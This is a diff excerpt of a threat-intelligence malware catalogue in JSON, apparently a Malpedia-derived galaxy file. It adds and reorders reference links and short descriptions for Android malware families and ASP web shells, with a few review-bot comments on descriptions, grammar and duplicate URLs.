+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.nexus",
+ "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail",
+ "https://www.cleafy.com/cleafy-labs/nexus-a-new-android-botnet"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fe0b4e6e-268e-4c63-a095-bf1ddff95055",
+ "value": "Nexus"
+ },
{
"description": "",
"meta": {
@@ -1999,10 +2166,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance",
- "https://securelist.com/apt-phantomlance/96772/",
- "https://securelist.com/it-threat-evolution-q2-2020/98230",
"https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://securelist.com/it-threat-evolution-q2-2020/98230",
+ "https://securelist.com/apt-phantomlance/96772/",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf",
"https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html"
],
@@ -2027,13 +2194,39 @@
"uuid": "ff00bbb6-6856-4cf5-adde-d1cc536dd0e2",
"value": "PhoneSpy"
},
+ {
+ "description": "According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system inform information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes and sending SMS messages. The malware also has features to facilitate device location tracking, deleting, downloading, and uploading files, reading connectivity state, speed, and activity, and toggling Bluetooth, Wi-Fi, and mobile data settings.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pineflower",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a17a7c5d-0a8f-42e7-b4c9-63c258267776",
+ "value": "PINEFLOWER"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixpirate",
+ "https://www.cleafy.com/cleafy-labs/pixpirate-a-new-brazilian-banking-trojan"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cdf707bd-a8b0-4ee3-917d-a56b11f30206",
+ "value": "PixPirate"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixstealer",
- "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/",
- "https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/"
+ "https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/",
+ "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/"
],
"synonyms": [
"BrazKing"
@@ -2048,9 +2241,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat",
- "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ",
"https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/",
- "https://labs.k7computing.com/?p=22537"
+ "https://labs.k7computing.com/?p=22537",
+ "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ"
],
"synonyms": [],
"type": []
@@ -2076,8 +2269,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30",
- "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/",
- "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/"
+ "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/",
+ "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/"
],
"synonyms": [
"Popr-d30"
@@ -2125,6 +2318,20 @@
"uuid": "cdaa0a6d-3709-4e6f-8807-fff388baaba0",
"value": "Rafel RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rambleon",
+ "https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab",
+ "https://interlab.or.kr/archives/2567"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "41ab3c99-297c-465c-8375-3e9f7ce4b996",
+ "value": "RambleOn"
+ },
{
"description": "",
"meta": {
@@ -2138,6 +2345,19 @@
"uuid": "65a8e406-b535-4c0a-bc6d-d1bec3c55623",
"value": "Rana"
},
+ {
+ "description": "RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East.\r\nThe malware is spread through links on social media and pretends to be applications for services like VPN and phone number spoofing. Unwary users download these trojan applications and grant access to malware. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ratmilad",
+ "https://socradar.io/new-spyware-ratmilad-targets-middle-eastern-mobile-devices"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "542c3e5e-2124-4c36-af05-65893974d5ce",
+ "value": "RatMilad"
+ },
{
"description": "",
"meta": {
@@ -2156,8 +2376,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores",
- "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html"
+ "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores"
],
"synonyms": [],
"type": []
@@ -2183,12 +2403,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe",
- "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html",
"http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/",
+ "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
"http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html",
"http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
- "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html"
+ "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html"
],
"synonyms": [],
"type": []
@@ -2228,25 +2448,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis",
+ "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
"https://securelist.com/roaming-mantis-reaches-europe/105596/",
"https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
- "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf",
- "https://securelist.com/roaming-mantis-part-v/96250/",
"https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/",
- "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/"
+ "https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f35f219a-6eed-11e8-980a-93bb96299951",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
"value": "Roaming Mantis"
},
@@ -2268,8 +2479,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik",
- "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java",
- "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer"
+ "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
+ "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
],
"synonyms": [],
"type": []
@@ -2291,16 +2502,18 @@
"value": "Sauron Locker"
},
{
- "description": "",
+ "description": "SharkBot is a piece of malicious software targeting Android Operating Systems (OSes). It is designed to obtain and misuse financial data by redirecting and stealthily initiating money transfers. SharkBot is particularly active in Europe (United Kingdom, Italy, etc.), but its activity has also been detected in the United States.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.sharkbot",
+ "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/",
"https://muha2xmad.github.io/malware-analysis/sharkbot/",
+ "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/",
+ "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
"https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe",
"https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/",
- "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/",
- "https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/",
- "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/"
+ "https://bin.re/blog/the-dgas-of-sharkbot/",
+ "https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/"
],
"synonyms": [],
"type": []
@@ -2352,23 +2565,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo",
- "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html",
- "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html"
+ "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html",
+ "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
],
"synonyms": [
"SlemBunk"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f8047de2-fefc-4ee0-825b-f1fae4b20c09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff",
"value": "Slempo"
},
@@ -2377,8 +2581,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker",
- "https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/",
+ "https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/"
],
"synonyms": [],
"type": []
@@ -2391,8 +2595,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent",
- "https://blog.alyac.co.kr/2128",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/"
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/",
+ "https://blog.alyac.co.kr/2128"
],
"synonyms": [],
"type": []
@@ -2417,10 +2621,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova",
- "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html",
"https://muha2xmad.github.io/malware-analysis/sova/",
- "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly",
- "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/"
+ "https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections",
+ "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/",
+ "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html",
+ "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail",
+ "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly"
],
"synonyms": [],
"type": []
@@ -2433,8 +2639,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker",
- "https://news.drweb.com/show/?i=11104&lng=en",
- "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/"
+ "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/",
+ "https://news.drweb.com/show/?i=11104&lng=en"
],
"synonyms": [],
"type": []
@@ -2460,9 +2666,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax",
- "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league",
+ "https://twitter.com/malwrhunterteam/status/1250412485808717826",
+ "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html",
"https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
- "https://twitter.com/malwrhunterteam/status/1250412485808717826"
+ "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league"
],
"synonyms": [],
"type": []
@@ -2471,21 +2678,26 @@
"value": "SpyMax"
},
{
- "description": "",
+ "description": "The malware has been released on github at https://github.com/EVLF/Cypher-Rat-Source-Code",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote",
- "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
"https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/",
- "https://labs.k7computing.com/index.php/spynote-an-android-snooper/",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan",
- "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
"https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
+ "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html",
+ "https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/",
+ "https://labs.k7computing.com/index.php/spynote-an-android-snooper/",
+ "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan",
+ "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
"https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr"
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/"
+ ],
+ "synonyms": [
+ "CypherRat"
],
- "synonyms": [],
"type": []
},
"uuid": "31592c69-d540-4617-8253-71ae0c45526c",
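Review bot: the new description only names a source-code repository and says nothing about what the family is, while the `value` stays "SpyNote" and the added synonym is "CypherRat"; the description should state the family and how CypherRat relates to it, and "github" should be spelled "GitHub". A one-sentence summary of the RAT's functionality drawn from the cited references would be more useful than the repository URL alone.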
@@ -2529,15 +2741,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a33df440-f112-4a5e-a290-3c65dae6091d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76",
"value": "Svpeng"
},
@@ -2623,7 +2826,7 @@
"value": "ThiefBot"
},
{
- "description": "",
+ "description": "According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.tianyspy",
@@ -2656,8 +2859,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan",
- "https://www.alienvault.com/blogs/labs-research/delivery-keyboy",
- "https://blog.lookout.com/titan-mobile-threat"
+ "https://blog.lookout.com/titan-mobile-threat",
+ "https://www.alienvault.com/blogs/labs-research/delivery-keyboy"
],
"synonyms": [],
"type": []
@@ -2670,16 +2873,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada",
- "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/",
"https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/",
"https://securelist.com/apkpure-android-app-store-infected/101845/",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
+ "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/",
+ "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html",
"https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/",
"https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
"http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
- "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
- "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html",
- "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/"
+ "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/"
],
"synonyms": [],
"type": []
@@ -2755,12 +2958,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005",
- "https://blog.talosintelligence.com/2020/10/donot-firestarter.html",
- "https://community.riskiq.com/article/6f60db72",
- "https://s.tencent.com/research/report/951.html",
- "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/",
"https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html",
- "https://twitter.com/voodoodahl1/status/1267571622732578816"
+ "https://s.tencent.com/research/report/951.html",
+ "https://community.riskiq.com/article/6f60db72",
+ "https://twitter.com/voodoodahl1/status/1267571622732578816",
+ "https://blog.talosintelligence.com/2020/10/donot-firestarter.html",
+ "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/"
],
"synonyms": [],
"type": []
@@ -2773,10 +2976,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006",
- "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749",
- "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20",
"https://twitter.com/ReBensk/status/1438027183490940931",
- "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/"
+ "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20",
+ "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/",
+ "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749"
],
"synonyms": [],
"type": []
@@ -2815,9 +3018,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.vajraspy",
- "https://twitter.com/LukasStefanko/status/1509451238366236674",
"https://twitter.com/malwrhunterteam/status/1481312752782258176",
- "https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww"
+ "https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww",
+ "https://twitter.com/LukasStefanko/status/1509451238366236674"
],
"synonyms": [],
"type": []
@@ -2840,14 +3043,27 @@
"uuid": "1ad5b462-1b0d-4c2f-901d-ead6c9f227bc",
"value": "vamp"
},
+ {
+ "description": "According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vinethorn",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6da6dfb6-2c50-465c-9394-26695d72e8c7",
+ "value": "VINETHORN"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat",
- "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
"https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/",
- "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf"
+ "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf",
+ "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/"
],
"synonyms": [],
"type": []
@@ -2860,6 +3076,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.vultur",
+ "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
+ "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
"https://www.threatfabric.com/blogs/vultur-v-for-vnc.html",
"https://twitter.com/_icebre4ker_/status/1485651238175846400"
],
@@ -2877,9 +3095,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex",
"https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
- "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/",
"https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/",
- "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack"
+ "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack",
+ "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/"
],
"synonyms": [],
"type": []
@@ -2906,8 +3124,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba",
- "https://securelist.com/roaming-mantis-reaches-europe/105596/",
- "https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan"
+ "https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan",
+ "https://securelist.com/roaming-mantis-reaches-europe/105596/"
],
"synonyms": [],
"type": []
@@ -2920,8 +3138,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot",
- "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/",
- "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/"
+ "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/",
+ "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/"
],
"synonyms": [],
"type": []
@@ -2930,12 +3148,16 @@
"value": "Xbot"
},
{
- "description": "",
+ "description": "Xenomorph is a Android Banking RAT developed by the Hadoken.Security actor.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xenomorph",
"https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html",
- "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5"
+ "https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html",
+ "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html",
+ "https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html",
+ "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5",
+ "https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0"
],
"synonyms": [],
"type": []
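Review bot: grammar in the new description: "a Android Banking RAT" should read "an Android banking RAT" (article and capitalisation), matching the style of the other descriptions in this file.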
@@ -2974,21 +3196,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf",
- "https://blog.lookout.com/xrat-mobile-threat"
+ "https://blog.lookout.com/xrat-mobile-threat",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c76e2ee8-52d1-4a55-81df-5542d232ca32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
"value": "XRat"
},
@@ -3005,6 +3218,19 @@
"uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7",
"value": "YellYouth"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zanubis",
+ "https://labs.k7computing.com/index.php/an-upsurge-of-new-android-banking-trojan-zanubis/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cebf13e5-dbfc-49d6-8715-e3b7687d386f",
+ "value": "Zanubis"
+ },
{
"description": "",
"meta": {
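Review bot: the new Zanubis entry ships with `"description": ""` although a K7 analysis is cited right below it; the same applies to the new BADCALL (ELF) and BianLian (ELF) entries further down. A one-line description taken from the referenced write-up would make these clusters usable without following the links.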
@@ -3023,11 +3249,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark",
+ "https://securelist.com/whos-who-in-the-zoo/85394/",
"https://securelist.com/whos-who-in-the-zoo/85394",
"https://www.secureworks.com/research/threat-profiles/cobalt-juno",
- "https://securelist.com/whos-who-in-the-zoo/85394/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/"
],
"synonyms": [],
"type": []
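Review bot: `"https://securelist.com/whos-who-in-the-zoo/85394/"` and `"https://securelist.com/whos-who-in-the-zoo/85394"` are the same article with and without a trailing slash, and this hunk keeps both; the Trustwave URL in the AcidRain hunk below has the same trailing-slash pair. Normalise URLs (strip the trailing slash) before deduplicating so each reference appears once.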
@@ -3041,8 +3267,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg",
"https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1",
- "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2",
- "https://securelist.com/ztorg-from-rooting-to-sms/78775/"
+ "https://securelist.com/ztorg-from-rooting-to-sms/78775/",
+ "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2"
],
"synonyms": [
"Qysly"
@@ -3052,25 +3278,52 @@
"uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202",
"value": "Ztorg"
},
+ {
+ "description": "WebShell.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.nightrunner",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b0206aac-30ff-41ce-b7d4-1b94ab15e3b1",
+ "value": "Nightrunner"
+ },
+ {
+ "description": "WebShell.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.tunna",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b057f462-dc32-4f7b-95e0-98a20a48f2b2",
+ "value": "Tunna"
+ },
{
